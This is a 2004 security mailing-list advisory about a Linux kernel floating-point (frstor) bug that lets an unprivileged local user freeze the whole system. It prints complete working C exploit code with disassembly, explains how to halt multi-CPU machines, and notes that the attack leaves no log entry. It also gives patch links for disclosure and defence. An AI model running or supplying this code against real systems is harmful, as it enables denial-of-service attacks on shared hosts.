Date: 21 Jun 2004 11:52:42 +0200
From: SecuriTeam <support@securiteam.com>
To: list@securiteam.com
Subject: [EXPL] Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code
------------------------------------------------------------------------
SUMMARY
The kernel is the most important part of the Linux operating system. It
handles communication with the computers hardware and decides the priority
of running programs (processes). If the kernels stops doing its job,
everything else will too.
A bug in the Linux kernel lets a simple C program to crash the kernel,
effectively locking the whole system. No root access is required, only
local unprivileged access is needed.
DETAILS
Vulnerable Systems:
* Linux kernel versions 2.4.2x through 2.6.x on x86 and amd64 systems
Immune Systems:
* Linux kernel version 2.6.7 (latest)
* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel)
* Linux Kernel 2.6.4 SMP patched with staircase scheduler
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1
* 2.2.19-kernel
Exploit Code:
The code that crashes the kernel is provided below:
--------------------------------- Begin Code
---------------------------------
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler
* inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// <<EOF
---------------------------------- End Code
----------------------------------
Note: This bug is confirmed to be present when the code is compiled with
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel
versions 2.4.2x and 2.6.x on x86 and amd64 systems. This code does not
compile (makes no executable) on sparc64 sun4u TI UltraSparc II
(BlackBird). This doesn't affect NetBSD Stable as well.
SMP systems can be compromised although a seperate instance of the program
is needed for each CPU before the system will halt. Each instance of the
program code will lock one CPU and this process can not be killed. If you
have two CPUs the second instance of the program kills the entire machine.
Since this exploit only requires a local shell with no privileges, any
user who has a shell account, whether in an ISP web hosting or others,
will be able to completely bring down the machine with minimum effort.
Since the kernel immediately freezes, the attack will not be logged at
all.
Patch Availability:
The following links can be used in order to patch the kernel. The new
Linux kernel is of course immune to this issue.
Patch for 2.4.2x Kernels, x86 and x86_64:
* Patch for 2.4.2x, x86 -
<http://linux.bkbits.net:8080/linux-2.4/gnupatch@40cdf6f8V7sOe5n96HA5Q7r9uDRvJQ> Bitkeeper i387.h patch x86
* x86-64 is missing in Bitkeeper, Andr Tomt posted patches including
x86_64 at <http://tomt.net/kernel/clear_fpu/>;
http://tomt.net/kernel/clear_fpu/
<http://linuxreviews.org/news/2004-06-11_kernel_crash/24_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; http://linuxreviews.org/news/2004-06-11_kernel_crash/24_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt
Once the patch has been applied, the code can't halt the machine, although
the process itself will consume 99% CPU usage. However, it can now be
killed and the threat removed.
Patch for 2.6.xx Kernels, x86 and x86_64:
* Patch for 2.6.x, x86 -
<http://linux.bkbits.net:8080/linux-2.6/gnupatch@40cbb80fOHy9vCWmfUx3PVJBWei0Hw> Bitkeeper i387.h patch x86
* Patch for 2.6.x, x86_64 -
<http://linuxreviews.org/news/2004-06-11_kernel_crash/26_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; Bitkeeper i387.h patch x86_64
* Both -
<http://linuxreviews.org/news/2004-06-11_kernel_crash/26_kernel_ia32-and-x86_64-fix-fpu-state.patch.txt>; 26_kernel_ia32-and-x86_64-fix-fpu-state.patch
ADDITIONAL INFORMATION
The information has been provided by <mailto:jerome@gmanmi.tv> JM.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
